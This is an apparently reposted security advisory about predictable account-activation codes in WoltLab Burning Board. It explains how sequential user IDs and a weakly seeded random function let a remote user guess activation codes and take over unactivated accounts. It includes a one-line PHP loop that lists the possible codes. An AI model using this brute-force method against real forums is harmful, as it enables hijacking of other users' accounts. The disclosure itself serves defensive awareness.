WoltLab Burning Board Hijacking

WoltLab Burning Board Hijacking

An authentication vulnerability was reported in the WoltLab Burning Board web forum software. A remote user may be able to hijack a newly registered user account. It is reported that WoltLab Burning Board (wBB) uses predictable or guessable temporary passwords when it creates a new user account. If another user has requested a new account but has not yet activated the registration, the user’s account may be hijacked. To determine how many users exist on the forum, a remote user can register for a new account. The remote user will receive a confirmation e-mail that contains the following type of URL to activate the account: http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322 In the above example, it is shown that any subsequent user will be assigned userid of 346 or higher. So, a remote user can attempt to guess the ‘code’ for any subsequent user. According to the report, the wBB software uses the date to seed a function that will generate only a limited number of codes (possibly 30 integer words). So, a remote user can feasibly conduct a brute force guessing attack to guess the proper code for a newly assigned user account. A demonstration exploit that will apparently generate all of the possible codes is provided: for($i=0; $i<60; $i++) { mt_srand($i); echo mt_rand().”<BR>”; } Solution: No solution was available at the time of this entry. More to read: Password Security and Storage

WoltLab Burning Board Hijacking Read More »